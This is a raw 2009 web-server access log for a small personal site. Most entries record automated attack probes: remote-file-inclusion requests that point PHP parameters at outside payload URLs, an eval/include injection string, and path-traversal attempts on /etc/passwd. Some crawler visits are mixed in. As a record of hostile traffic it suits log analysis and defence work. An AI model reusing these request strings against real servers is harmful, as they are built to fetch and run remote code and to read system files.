84.227.51.5 - - [24/Jun/2009:15:03:58 -0700] "GET /~t290/logs/access.log.0/send_reminders.php?includedir=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 322 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 web.hypersurf.com
84.227.51.5 - - [24/Jun/2009:15:03:59 -0700] "GET /~t290/logs/send_reminders.php?includedir=http://www.vietnamngaymai.org/ngaymai/modules/Forums/admin/.../syx.txt???? HTTP/1.1" 404 309 /home/users/t/t290/public_html/logs/send_reminders.php "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:15:10:43 -0700] "GET /~t290/logs/access.log HTTP/1.0" 200 400126 /home/users/t/t290/public_html/logs/access.log "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 web.hypersurf.com
67.19.130.218 - - [24/Jun/2009:15:11:04 -0700] "GET /~t290/logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 331 /home/users/t/t290/public_html/logs/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
67.19.130.218 - - [24/Jun/2009:15:11:04 -0700] "GET /~t290/logs/access.log.0%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 346 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
67.19.130.218 - - [24/Jun/2009:15:11:04 -0700] "GET /~t290/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.1" 404 326 /home/users/t/t290/public_html/lib "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [24/Jun/2009:15:41:27 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [24/Jun/2009:15:41:27 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/h/hyper/public_html/sorry.shtml69.94.125.100 - - [24/Jun/2009:15:41:27 -0700] "GET //skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_thi
69.94.125.100 - - [24/Jun/2009:15:41:27 -0700] "GET /~t290//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:44:10 -0700] "GET /~t290//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:44:10 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:44:10 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:48:16 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:48:16 -0700] "GET /~t290//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
59.24.49.35 - - [24/Jun/2009:15:48:16 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [24/Jun/2009:15:51:02 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 357 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [24/Jun/2009:15:51:02 -0700] "GET /~t290//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
69.94.125.100 - - [24/Jun/2009:15:51:02 -0700] "GET /~t290/logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.catchmag.fr//components/fx29id.txt?? HTTP/1.1" 404 344 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
125.214.64.102 - - [24/Jun/2009:16:12:21 -0700] "GET /~t290//includes/ktedit/toolbar.php?dirDepth=http://www.ecobook.or.kr/ecobook/data/ecobook/1132295039/copyright.txt???? HTTP/1.1" 404 314 /home/users/t/t290/public_html/includes "-" "Mozilla/5.0" 0 web.hypersurf.com
125.214.64.102 - - [24/Jun/2009:16:12:21 -0700] "GET /~t290/logs/access.log.0%20%20//includes/ktedit/toolbar.php?dirDepth=http://www.ecobook.or.kr/ecobook/data/ecobook/1132295039/copyright.txt???? HTTP/1.1" 404 334 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
125.214.64.102 - - [24/Jun/2009:16:12:21 -0700] "GET /~t290/logs//includes/ktedit/toolbar.php?dirDepth=http://www.ecobook.or.kr/ecobook/data/ecobook/1132295039/copyright.txt???? HTTP/1.1" 404 319 /home/users/t/t290/public_html/logs//includes "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:17:28:39 -0700] "GET /~t290/logs/access.log.0%20%20/?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 306 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:17:28:39 -0700] "GET /~t290/?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 897 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:17:28:39 -0700] "GET /~t290/logs/?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 12393 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:40:45 -0700] "GET /~t290/logs/access.log.0/?phpbb_root_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:40:45 -0700] "GET /~t290/logs/?phpbb_root_path=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 200 12393 /home/users/t/t290/public_html/logs/ "-" "libwww-perl/5.826" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:42:13 -0700] "GET /~t290/logs/access.log.0/write.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:42:13 -0700] "GET /~t290/logs/write.php?dir=http://baumann-oliver.de/obitcon/cms/system/filepool/.../id.txt??? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/write.php "-" "libwww-perl/5.826" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:00 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:00 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:00 -0700] "GET /~t290/logs/access.log.0/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:43:14 -0700] "GET /~t290/logs/access.log.0/?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.826" 0 web.hypersurf.com
124.217.216.86 - - [24/Jun/2009:17:43:14 -0700] "GET /~t290/logs/?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 12393 /home/users/t/t290/public_html/logs/ "-" "libwww-perl/5.826" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:52 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:52 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:43:52 -0700] "GET /~t290/logs/access.log.0/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:44:21 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:44:21 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:44:21 -0700] "GET /~t290/logs/access.log.0%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 342 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:44:42 -0700] "GET /~t290/logs/write.php?dir=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 300 /home/users/t/t290/public_html/logs/write.php "-" "libwww-perl/5.803" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:44:42 -0700] "GET /~t290/logs/access.log.0/write.php?dir=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 313 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:45:34 -0700] "GET /~t290/logs/access.log.0/?phpbb_root_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:45:34 -0700] "GET /~t290/logs/?phpbb_root_path=http://closeup2.com/components/sex.txt??? HTTP/1.1" 200 12393 /home/users/t/t290/public_html/logs/ "-" "libwww-perl/5.803" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:46:36 -0700] "GET /~t290/logs/access.log.0/?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 304 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
208.111.94.201 - - [24/Jun/2009:17:46:38 -0700] "GET /~t290/logs/?phpbb_root_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 12393 /home/users/t/t290/public_html/logs/ "-" "libwww-perl/5.803" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:54:55 -0700] "GET /~t290//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 334 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:54:55 -0700] "GET /~t290/logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:54:58 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 352 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:55:38 -0700] "GET /~t290/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 322 /home/users/t/t290/public_html/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
72.82.228.83 - - [24/Jun/2009:17:55:38 -0700] "GET /~t290/logs/access.log.0/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 340 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com /home/users/h/hyper/public_html/sorry.shtml72.82.228.83 - - [24/Jun/2009:17:55:38 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HT
72.82.228.83 - - [24/Jun/2009:17:55:38 -0700] "GET /~t290/logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 327 /home/users/t/t290/public_html/logs/modules "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:56:27 -0700] "GET /~t290/logs/access.log.0%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:56:30 -0700] "GET /~t290/logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 339 /home/users/t/t290/public_html/logs//skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:56:30 -0700] "GET /~t290//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 334 /home/users/t/t290/public_html/skin_shop "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:17:56:30 -0700] "GET /~t290/logs/access.log.0%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:18:13:14 -0700] "GET /~t290/logs/access.log.0%20%20//?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 307 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:18:13:14 -0700] "GET /~t290/logs//?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 12398 /home/users/t/t290/public_html/logs/ "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:18:13:14 -0700] "GET /~t290//?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 200 903 /home/users/t/t290/public_html/ "-" "Mozilla/5.0" 0 web.hypersurf.com
65.254.216.47 - - [24/Jun/2009:18:19:39 -0700] "GET /~t290/logs/access.log.0//?phpbb_root_path=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 305 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:18:27:38 -0700] "GET /~t290/logs/access.log.0//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 352 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
66.249.67.34 - - [24/Jun/2009:18:53:30 -0700] "GET /~t290/twllpicts/island/ HTTP/1.1" 200 5109 /home/users/t/t290/public_html/twllpicts/island/index.htm "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 web.hypersurf.com
66.249.67.34 - - [24/Jun/2009:18:54:05 -0700] "GET /~t290/twllpicts/loonlake2/ HTTP/1.1" 200 3544 /home/users/t/t290/public_html/twllpicts/loonlake2/index.htm "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 web.hypersurf.com
66.249.67.34 - - [24/Jun/2009:18:54:28 -0700] "GET /~t290/twllpicts/loonlake1/ HTTP/1.1" 200 5600 /home/users/t/t290/public_html/twllpicts/loonlake1/index.htm "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 web.hypersurf.com
65.55.230.231 - - [24/Jun/2009:20:01:04 -0700] "GET /~t290/twllpicts/loonlake2/source/11.htm HTTP/1.1" 200 646 /home/users/t/t290/public_html/twllpicts/loonlake2/source/11.htm "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:20:03:01 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:20:03:01 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
83.149.105.122 - - [24/Jun/2009:20:03:01 -0700] "GET /~t290//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 346 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
201.232.54.48 - - [24/Jun/2009:20:10:13 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.805" 0 web.hypersurf.com
201.232.54.48 - - [24/Jun/2009:20:10:14 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.805" 0 web.hypersurf.com
74.203.196.99 - - [24/Jun/2009:20:10:53 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.819" 0 web.hypersurf.com
74.203.196.99 - - [24/Jun/2009:20:10:54 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.819" 0 web.hypersurf.com
74.203.196.99 - - [24/Jun/2009:20:11:09 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.819" 0 web.hypersurf.com
74.203.196.99 - - [24/Jun/2009:20:11:09 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.unreals.co.cc/bajoid.txt?? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "libwww-perl/5.819" 0 web.hypersurf.com
209.25.170.73 - - [24/Jun/2009:20:12:20 -0700] "GET /~t290/logs/access.log.0/http://www.gordongroup.co.uk/Images/idx? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
209.25.170.73 - - [24/Jun/2009:20:12:20 -0700] "GET /~t290/logs/http://www.gordongroup.co.uk/Images/idx? HTTP/1.1" 404 330 /home/users/t/t290/public_html/logs/http: "-" "libwww-perl/5.803" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:16:37 -0700] "GET /~t290//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:16:37 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:16:37 -0700] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 366 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:19:58 -0700] "GET /~t290//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 346 /home/users/t/t290/public_html/administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:19:58 -0700] "GET /~t290/logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 351 /home/users/t/t290/public_html/logs//administrator "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:19:58 -0700] "GET /~t290/logs/access.log.0%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 366 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
217.125.38.117 - - [24/Jun/2009:20:22:58 -0700] "GET /~t290/logs/access.log.0//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://220.79.47.122//bbs/data/news/id1.txt? HTTP/1.1" 404 364 /home/users/t/t290/public_html/logs/access.log.0 "-" "Mozilla/5.0" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:20:32:35 -0700] "GET /~t290/logs/stats-2002/May.wwwstats.html.gz HTTP/1.0" 404 310 /home/users/t/t290/public_html/logs/stats-2002 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:20:49:21 -0700] "GET /~t290/twllpicts/island/source/13.htm HTTP/1.0" 304 - /home/users/t/t290/public_html/twllpicts/island/source/13.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
72.30.79.112 - - [24/Jun/2009:20:52:08 -0700] "GET /~t290/twllpicts/island/source/10.htm HTTP/1.0" 200 668 /home/users/t/t290/public_html/twllpicts/island/source/10.htm "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 web.hypersurf.com
64.13.231.196 - - [24/Jun/2009:21:00:16 -0700] "GET /~t290/logs/access.log.0/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/MADONGCMD.txt?? HTTP/1.1" 404 354 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.79" 0 web.hypersurf.com
64.13.231.196 - - [24/Jun/2009:21:00:16 -0700] "GET /~t290/logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/MADONGCMD.txt?? HTTP/1.1" 404 341 /home/users/t/t290/public_html/logs/components "-" "libwww-perl/5.79" 0 web.hypersurf.com
209.25.170.73 - - [24/Jun/2009:21:05:21 -0700] "GET /~t290/logs/access.log.0/http://www.gordongroup.co.uk/Images/idx? HTTP/1.1" 404 343 /home/users/t/t290/public_html/logs/access.log.0 "-" "libwww-perl/5.803" 0 web.hypersurf.com
209.25.170.73 - - [24/Jun/2009:21:05:21 -0700] "GET /~t290/logs/http://www.gordongroup.co.uk/Images/idx? HTTP/1.1" 404 330 /home/users/t/t290/public_html/logs/http: "-" "libwww-perl/5.803" 0 web.hypersurf.com
38.99.44.101 - - [24/Jun/2009:21:31:27 -0700] "GET /~t290/logs/awstats.t290.allrobots.html HTTP/1.0" 404 306 /home/users/t/t290/public_html/logs/awstats.t290.allrobots.html "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 web.hypersurf.com
218.30.100.97 - - [24/Jun/2009:22:06:39 -0700] "GET /~t290/logs///index1.php?mosConfig_absolute_path=http://prideknives.co.nz/log/1.txt? HTTP/1.1" 404 303 /home/users/t/t290/public_html/logs///index1.php "-" "Mozilla/5.0" 0 web.hypersurf.com
